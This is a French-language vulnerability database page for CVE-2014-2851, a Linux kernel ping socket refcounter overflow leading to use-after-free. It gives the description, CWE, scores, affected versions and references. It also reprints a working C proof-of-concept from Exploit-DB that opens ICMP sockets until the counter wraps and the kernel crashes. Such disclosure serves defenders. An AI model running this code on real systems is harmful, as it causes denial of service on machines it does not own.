CVE-2014-2851 : Détail

CVE-2014-2851

Memory Corruption
0.06%V3
Local
2014-04-14
21h00 +00:00
2017-01-04
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Integer overflow in the ping_init_sock function in net/ipv4/ping.c in the Linux kernel through 3.14.1 allows local users to cause a denial of service (use-after-free and system crash) or possibly gain privileges via a crafted application that leverages an improperly managed reference counter.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-416 Use After Free
The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. Any operations using the original pointer are no longer valid because the memory "belongs" to the code that operates on the new pointer.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.9 AV:L/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 32926

Date de publication : 2014-04-17 22h00 +00:00
Auteur : Thomas Pollet
EDB Vérifié : No

/* * DoS poc for CVE-2014-2851 * Linux group_info refcounter overflow memory corruption * * https://lkml.org/lkml/2014/4/10/736 * * @Tohmaxx - http://thomaspollet.blogspot.be * * If the app doesn't crash your system, try a different count (argv[1]) * Execution takes a while because 2^32 socket() calls * */ #include <arpa/inet.h> #include <stdio.h> #include <sys/socket.h> int main(int argc, char *argv[]) { int i ; struct sockaddr_in saddr; unsigned count = (1UL<<32) - 20 ; if(argc >= 2){ // Specify count count = atoi(argv[1]); } printf("count 0x%x\n",count); for(i = 0 ; (unsigned)i < count;i++ ){ socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP); if ( i % ( 1 << 22 ) == 0 ) printf("%i \n",i); } //Now make it wrap and crash: system("/bin/echo bye bye"); }

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version From (including) 3.0 To (excluding) 3.2.60

Linux>>Linux_kernel >> Version From (including) 3.3 To (excluding) 3.4.92

Linux>>Linux_kernel >> Version From (including) 3.5 To (excluding) 3.10.41

Linux>>Linux_kernel >> Version From (including) 3.11 To (excluding) 3.12.19

Linux>>Linux_kernel >> Version From (including) 3.13 To (excluding) 3.14.5

Linux>>Linux_kernel >> Version 3.0

Configuraton 0

Debian>>Debian_linux >> Version 7.0

Références

http://www.securitytracker.com/id/1030769
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/59386
Tags : third-party-advisory, x_refsource_SECUNIA
https://lkml.org/lkml/2014/4/10/736
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/59599
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2014/dsa-2926
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.securityfocus.com/bid/66779
Tags : vdb-entry, x_refsource_BID
http://www.openwall.com/lists/oss-security/2014/04/11/4
Tags : mailing-list, x_refsource_MLIST